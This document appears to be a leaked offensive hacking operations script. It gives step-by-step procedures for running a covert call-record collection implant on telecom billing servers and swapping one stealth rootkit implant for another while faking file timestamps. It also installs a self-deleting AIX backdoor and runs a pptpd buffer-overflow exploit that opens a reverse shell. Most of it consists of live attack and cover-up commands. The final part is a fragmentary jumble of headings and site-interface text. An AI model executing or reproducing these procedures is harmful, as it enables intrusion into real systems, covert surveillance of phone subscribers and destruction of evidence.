## vi Search/Replace commands:
## projectName - self explanatory, all CAPS
## date field - today's date, used for output files
## hostname.ip - hostname of the box and IP address exactly as displayed in nop
en window title bar
## or as seen in /current/down
## cryptkey - encryption key (already have one, or use output from below md5
sum command)
##
mx
:%s/HOSTNAME.IP/HOSTNAME.IP/g
'x
##
## copy the ER directory "er_PROJECTNAME" from the project's /targets/<proj_name
>/sustained directory
## to /current/down and make sure there are no tarballs in /current/down
##
mz
cp -r /mnt/zip/er_PROJECTNAME /current/down
cd /current/down/er_PROJECTNAME
uz
##
## save the encryption key locally in /current/down
## whether you have a new or old key:
##
echo CRYPTKEY > /current/down/cryptkey.enemyrun.DDMonYY
## copy key to ER directory if creating a new key
echo CRYPTKEY > /current/down/er_PROJECTNAME/cryptkey.enemyrun.DDMonYY
##
## implant hidden directory for script commnads
## location is implant dependent
## INCISION:
## Solaris - /platform/SUNW,SystemEngine/kernel/drv
## Linux - (hidden independently; check old opnotes)
## STOICSURGEON: (hidden directory is displayed at beginning of FTSHELL/ish
callback)
## no trailing /
##
mx
:%s:IMPLANT_HIDDEN_DIRECTORY:IMPLANT_HIDDEN_DIRECTORY:g
'x
##
## prepare files containing numbers to search for:
## if files containing the numbers to search available:
##
mz
ls -altr
##
## prep the argfiles:
## make sure the files are ASCII and contain NO EMPTY LINES!!
## make sure the last line does not contain a null character at the end
## (vi the file, add a carriage return to the last line, then delete the emp
ty
## line and save)
## "file" results:
## this will not work: ASCII text, with CRLF line terminators
## this WILL: ASCII text
##
cat arg*
file arg*
dos2unix arg*
file arg*
##
## if no data media is provided:
## locally, create a file of numbers to grep for with each number on a separate
line
## make sure there are NO EMPTY LINES!!!!
## Format of each type of argument:
## p123456789 - phone number
## s123456789 - IMSI
## e123456789 - IMEI
## c123/456 - Cell/LAC (no leading 0's)
##
vim /current/down/argfiles/argfile1.txt
##
## encrypt argfiles / target files
##
## encrypt the ascii list...first make sure you have the encryption tool:
## if cryptTool not in PATH, change your PATH or insert full path in command
## to encrypt one at a time...skip to next comment to encrypt all at once:
EY -b
EY -b
## to encrypt all at the same time:
ls -l
file argfile*.enc
##
## on target look at CDR directories:
## - use the following commands to determine the location of current CDR data st
orage
## - once you identify the location of the data, you'll use the head/tail comman
ds
## to determine the date ranges being saved
## - these date ranges will be used as settings in the ER configuration file(s)
##
##
## typical file locations per host:
##
######################### aromaseal:
######################### desertvista:
-lt /var/archive/output_billing
-vget /var/archive/output_billing/MoveData.sh
######################### diamondaxe:
########################## editionhaze:
## billing02 10.100.10.140
ls -latr /d08/saba/CDR/out/MS* | head -10
ls -latr /d08/saba/CDR/out/MS* | tail -10
ls -latr /d08/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## serenecosmos:
ls -latr /var/opt/archive/tape/*/*_S_*.gz | head -10
ls -latr /var/opt/archive/tape/*/*_S_*.gz | tail -10
########################## sicklestar:
## magnum: CURSEHAPPY not working on all SS .usd files :-(
## Try these first, should be all of them in one spot
## if none in previous ones...
######################### qualitygel:
########################## wholeblue:
## tpmw01 10.3.4.55
## tpmw02 10.3.4.56
## verifies isb, khi, and lhr directories:
## shows oldest and newest files in directories:
## isbapro1 10.5.7.51
## nothing new
10
10
10
10
10
10
## newer stuff
## old stuff:
#############
## COLLECT ##
#############
##
## cd to hidden directory where ENEMYRUN is set up
## when in the hidden directory, there could be two subdirectories;
## one for a forward instance and one backward (e.g. erf and erb)
##
-cd IMPLANT_HIDDEN_DIRECTORY
##
## there should be files in:
## er*/aux_*/output/final
## and possibly if parsing is occuring:
## er*/aux_*/output
##
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## stop current instances on ENEMYRUN
## need name of process ENEMYRUN is running as on target; should be on plan, or
check old opnotes
## ER_PROCESS_NAME: name under which ENEMYRUN is running on target; try nscd whi
ch will look like ./nscd
##
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## kill with SIGTERM; if it doesn't work use kill -9
## ENEMYRUN_PID: process id under which ENEMYRUN is running on target
kill -15 ENEMYRUN_PID
##
## collect parsed CDRs and logs created from the backward directory
## files are encrypted
##
-get IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
-get IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## in a local window make sure you have them all:
ls -laR /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*
##
## clean ER directories
##
## remove parsed CDRs
rm -fr IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
## remove old logs
rm -f IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## remove the status.log file >>>ONLY<<< from the >>>BACKWARDS<<< directory
rm -f IMPLANT_HIDDEN_DIRECTORY/erb/status.log
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## edit ER configuration files
##
## in a local window
## find ER configs
ls -la er_conf*.txt
## should usually not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## probably have to change START_DAY and STOP_DAY
## START_DAY: YYYYMMDD # day backwards in time from which to start
## STOP_DAY: YYYYMMDD # day forwards from START_DAY: to stop
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files and save
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_b
wd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_f
wd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erb/adm1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_bwd.enc IMPLANT_HIDDEN_DIRECTORY/erb/e
cb
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erb
L='-I ecb -k CRYPTKEY'; export L; ./nscd
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## backward ENEMYRUN_PROCESS_NAME
## pid:
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>.*
-ls -R erb
-ls -R IMPLANT_HIDDEN_DIRECTORY/erb
## -------------- ##
## FORWARDS FILES ##
## -------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1
## or
-put /current/down/argfiles/argfile_forward.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm
1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_fwd.enc IMPLANT_HIDDEN_DIRECTORY/erf/e
cf
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erf
L='-I ecf -k CRYPTKEY'; export L; ./nscd
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## forward ENEMYRUN_PROCESS_NAME
## pid: ER_PID
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>.*
-ls -R erf
-ls -R IMPLANT_HIDDEN_DIRECTORY/erf
##
## once all required ER instances are running, you're done
##
-cd /tmp
-burnBURN
##
## decrypt parsed CDRs locally
##
## single aux* directory
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erb
## and/or
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/final
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.tx
t -k CRYPTKEY -d -c -b ; done
## multiple aux* directories
mkdir /current/down/coll
cp /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*/aux*/output/final/* /cu
rrent/down/coll
cd /current/down/coll
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.tx
t -k CRYPTKEY -d -c -b ; done
##
## copy decrypted data to media / remove ER tar from /current/down
##
ls -la *.txt
mz
cp *.txt /mnt/zip*/PROJECTNAME
ls -la /mnt/zip*/PROJECTNAME
uz
rm /current/down/er_*.tar
############
## DEPLOY ##
############
##
## edit ER configuration files
##
## in a local window
## find ER configs
ls -la er_conf*.txt
## should not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_b
wd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_f
wd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## encrypt CURSEHAPPY definition file if using CURSEHAPPY
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl
-i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -la
file /current/up/cursedefs/*.enc
##
## put up directories and tools only if deploying ENEMYRUN
## this means only put up these files/tools if they are not on the target yet
## if you have the least doubt about what you're doing, find someone who knows
##
## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
-put /current/down/er_PROJECTNAME/erb_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erb.tar
tar xvf erb.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erb
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erb
/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTO
RY/erb/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erb/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erb/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erb/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/er
b/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erb.tar
## -------------- ##
## FORWARDS FILES ##
## -------------- ##
-put /current/down/er_PROJECTNAME/erf_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erf.tar
tar xvf erf.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erf
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erf
/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTO
RY/erf/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erf/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erf/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erf/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/er
f/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erf.tar
##
## to continue the setup process go to the COLLECT section item titled:
## "edit ER configuration files"
##
###
### END File user.tool.enemyrun.COMMON
### (see also ../etc/user.tool.enemyrun.COMMON)
###
### BEGIN File user.tool.linux_remove_in_install_ss.COMMON (see also ../etc/us
er.tool.linux_remove_in_install_ss.COMMON)
###
### Upgrading a Linux Incision to a Stoicsurgeon
### Step 1: Trigger Incision or -elevate
### Step 2: Save timestamps of affected files/directories
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/beforetimes
### Step 3: Upload dittlelight
-put /current/up/hidelite.linux h
### Step 4: Need a nopen callback window to use dittlelight (will not
### work on any pids with parents that aren't 1, and callback
### windows do that)
-nrtun PORT
-call REDIR_IP:PORT
### Step 5: In the callback window, get your PID (and make sure the
### PPID is 1
-pid
### Step 6: Unhide your callback window
./h -u -p CALLBACK_PID
### Step 7: Make sure you are unhidden by comparing process listings
### and directory listings, and there should be differences
ps -ef | grep sendmail
-lt /dev/ttyi*
### Step 8: In unhidden window, trigger Incision self-destruct
touch /dev/ttyia3
### Step 9: Repeat step 7, except now instead of being different,
### the two windows should now be the same because Incision
### is gone, so everything is unhidden
ps -ef | grep sendmail
-lt /dev/ttyi*
### Step 10: Remove file we touched/"created"
-rm /dev/ttyia3
### Step 11: At this point, follow the "user.tool.stoicsurgeon"
### script in /current/etc to install Stoicsurgeon
### Step 12: Once Stoicsurgeon is installed, restore timestamps
### for the files/dirs affected by the Incision uninstall
### These are saved in "/current/down/beforetimes" from Step 2
### NOTE: If "-ctrl" does not work, upload and run the standalone
### "Ctrl" program, computing the SEED variable as described
### in the "user.tool.stoicsurgeon" script if needed, or
### you can trigger and not need the SEED
-ctrl -s /sbin/init ATIME 0 MTIME 0 CTIME 0
-ctrl -s /sbin ATIME 0 MTIME 0 CTIME 0
-ctrl -s /dev ATIME 0 MTIME 0 CTIME 0
### Step 13: Confirm timestamps are restored
### This is a bit tricky to see that everything is right, so
### confirm that:
### 1. everything for /sbin should match (i.e. no diff line)
### 2. there should be no /dev/ttyia* files in aftertimes
### 3. /dev may not match exactly if there were changes, but
### /dev can change a lot so not a huge deal
### 4. the timestamps for /sbin/init should be the same in
### beforetimes and aftertimes
### 5. the inode field (8th field in stat output) from
### /dev/ttyia1 in beforetimes should match inode field
### from /sbin/init in aftertimes
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/aftertimes
-lsh diff /current/down/beforetimes /current/down/aftertimes
### All done!$###$
###
### END File user.tool.linux_remove_in_install_ss.COMMON
### (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON)
###
### BEGIN File user.tool.slyheretic.COMMON (see also ../etc/user.tool.slyheret
ic.COMMON)
###
#########################################################
# SLYHERETIC v1.0.5.0
#########################################################
### SLYHERETIC is a light-weight implant for AIX 5.1 and AIX 5.2 Uses Hide-in-Pl
ain-Sight techniques to provide stealth.
### SlyHeretic_Persistent: This installer injects a backdoor into a system proce
ss and persists across system reboots.
### SlyHeretic_OneShot: This installer injects a backdoor into a system process
and does not persist across system reboots.
### All SLYHERETIC binaries delete themselves upon execution.
**IMPORTANT: SINCE SLYHERETIC Uses Hide-in-Plain-Sight techniques to provide ste
alth ensure that you get off of box if known administrators are on the box.**
**IMPORTANT: Do not install SLYHERETIC on systems where TripWire is installed. *
**********************************
######################################################### Persistent Install####
##################################################################
## To install the Persistent version of SLYHERETIC perform the following steps.
## Upload the SlyHeretic_Persistent binary to the target with the name 'date' on
a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Persistent date
### Execute the installer with the following command:
PATH=. date
## Check the installer error code by looking at the 'date' string reported. The
installer will report a 'date' string with the
## seconds field as the error code. If the seconds field reports '00', the insta
llation was successful.
If you get an error code in the seconds field start the troubleshooting. The mos
t common error that you might receive is the '09' error.
This error means that no viable injection process is available at that particuli
ar time installation time. SLYHERETIC checks the process state prior to
injecting so it may determine that no process are good candiates for injection.
Wait a minute and try the install again. If that does not work contact
tool champion or developer.
########################################################## OneShot Install######
####################################################################
## Upload the SlyHeretic_OneShot binary to the target with the name 'date' on a
filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_OneShot date
PATH=. date
## Check the installer error code by looking at the 'date' string reported. The
installer will report a 'date' string with the
## seconds field as the error code. If the seconds field reports '00', the insta
llation was successful.
If you get an error code in the seconds field start the troubleshooting. The mos
t common error that you might receive is the '09' error.
This error means that no viable injection process is available at that particuli
ar time installation time. SLYHERETIC checks the process state prior to
injecting so it may determine that no process are good candiates for injection.
Wait a minute and try the install again. If that does not work contact
tool champion or developer.
#############################################################Uninstalling SLYHER
ETIC######################################################################
## Upload the SlyHeretic_Uninstaller binary to the target with the name 'date' o
n a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Uninstaller date
PATH=. date
The Uninstaller will not provide any out stating that the uninstall was successf
ul.
To verify uninstall you can attempt to trigger via tipoff or -irtun.
#########################################################SLYHERETIC REINSTALL###
#########################################################################
SLYHERETIC can be reinstalled on a system but only after an Uninstall has taken
place. A reinstall is simply the following steps:
Uninstall SLYHERETIC
Install SLYHERETIC
######################################################### TRIGGERING SLYHERETIC

#########################################################################
## Trigger SLYHERETIC and upload NOPEN with redirection.
-irtun TARGET_IP RANDOM_PORT -ueY5 ********SLYHERETIC uses DewDrop 3.X trigger**
********************************
###
### END File user.tool.slyheretic.COMMON
### (see also ../etc/user.tool.slyheretic.COMMON)
###
### BEGIN File user.tool.entrymanor.COMMON (see also ../etc/user.tool.entryman
or.COMMON)
###
###################################################
### ENTRYMANOR entrymanor binary: xp_pptpd
###################################################
2008-01-15 08:15:21 EST
Usage: ./xp_pptpd -i <pptp_server> -p <pptp_port> -l <localip> -r <localport>
-i target
-p port <default: 1723>
-l local IP
-r local port
-v verify server
-t timeout in seconds <default: 1 sec>
-s stack location <default starts at 0xbfffff00 and ends at 0xbfff0000>
-h help
-d debug
Check:
./xp_pptpd -i 127.0.0.1 -p 1723 -v
Then:
nc -vv -l -p 5492
./xp_pptpd -i 127.0.0.1 -p 1723 -l 555.1.2.22 -r 5492
0. will fail on pptpd versions greater than 1.1.4-b3 and 1.1.3-20030409.

1. Determine if the configuration of the target is exploitable by using the -v o
ption.
./xp_pptpd -i 127.0.0.1 -p 1723 -v
2. (In Window 1, type the following command)

# nc -vv -l -p 5492
listening on [any] 5492 ...
(after several seconds or minutes) ...
555.1.2.171: inverse host lookup failed: Unknown host
connect to [555.1.2.22] from (UNKNOWN) [555.1.2.171] 1047
(In Window 2, type the following command (use shell if running on linux pitch))
# ./xp_pptpd -i 555.1.2.171 -p 1723 -l 555.1.2.22 -r 5492
Bruteforcing against 555.1.2.171
interrupt when you get a shell to 555.1.2.22 on port 5492...
* connecting... [ret=0xbfffff00]..sending done
* connecting... [ret=0xbffffece]..sending done
* connecting... [ret=0xbffffe9c]..sending done
* connecting... [ret=0xbffffe6a]..sending done
* connecting... [ret=0xbffffe38]..sending done
* connecting... [ret=0xbffffe06]..sending done
...
* connecting... [ret=0xbffff82a]..sending done
* connecting... [ret=0xbffff7f8]..sending done
* connecting... [ret=0xbffff7c6]..sending done
(Hit <ctrl> c when you get a connection back in netcat.)
###
### END File user.tool.entrymanor.COMMON
### (see also ../etc/user.tool.entrymanor.COMMON)
#### BAIL
-cd /tmp/socket-root
-cd ..
-ls
rm -rf /tmp/socket-root
-ls
#### AT JOB (CAREFUL! These can log.)
at -l
at -r ATJOB
at -l
-burn
#### some.target.ip
#### 1.2.3.4

Opscript

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Opscript

Hochgeladen von

Copyright:

Verfügbare Formate

#### PITCHIMPAIR-LINUX

#### JL without jackpop redirector

#### JL with -jackpop

#################################### IF USING MOSTLY AUTOMATED CHOICE ABOVE

## This causes local spawn program to push up /current/up/u.tar.Z.uu if

#################################### END IF (CHOICE OF WHICH, MANUAL OR AUTO?)

#### JL with uploaded jackpop binary (way old way)

#### GOT ROOT?

### Set up variables. Use the next section for reference.

############ Set up nopen for access

### Filters out "last" command on initial ops on the target

### in setting up windows, you probably want this

### if done via PITCHIMPAIR infrastructure:

### See who's on

### maybe check logs?

### look for sniffers etc

### upload RAT

### On Windows box #####################

# This listens for the ish callback

# For nopen connection:

#ourtn -ueW 192.168.254.142:36541 -i 10.140.0.9 -C 10.140.0.9 -p 34789 -O 45665

# Call forward to nopen works to alien, start a -listen PORT to call fo

### upload cup

### query target:

### Usage for increasing number of connections to increase chances

#### get ptrace, forkpty, and nopen tarball ready to send:

telnet TARGET_IP 143

telnet fawn 143

### Locally (choose a method):

### back on target window:

Usage: ./envelopswallow <-switches> -h host[:80]

-scan http TARGET_IP

# 4.1 FreeBSD Apache 1.3.14 / 1.3.17 / 1.3.19 / 1.3.20 / 1.3.22 / 1.3.23 /

# 4.4 FreeBSD Apache 1.3.20(binary)

# 4.4 FreeBSD ru-apache+mod_ssl-1.3.20+30.5+2.8.4 (distro binary)

# 4.5 FreeBSD apache+mod_ssl-1.3.22+2.8.5_4(distro binary) and apache-1.3.2

upload local: rforkx.freebsd (FreeBSD 4.1 & 4.3)

### upload executable

# start nopen as root then reconnect

What assumptions have been made in the design of this capability?

### Thru a windows box:

# Logging depends on OS; usually indicated in smb.conf file or check:

### from redirector

# In the LOCAL window, use nftp to transfer a file in both directions

### Troubleshooting Elitehammer

### get nopen ready to paste with gedit:

# in a local scripted window:

### LISTENING on target

### Once you have root, get nopen up there:

### get nopen ready

./cmsex -i 127.0.0.1 -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet PITCH_IP NETC

###### 3. Plug in your choices and go:

### If successful, you should get a root shell

####### If you've hit this before and know the addresses:

############# BS w/ NO REDIRECTION ###########

### To give a port:

###### 4. COnnect to target:

# and this if nopen needs to run in callback mode:

### Syntax (domainname is not always necessary):

###### 4. From redirector:

### Or the old way:

###### YS With REDIRECTION:

###### 2. Local window1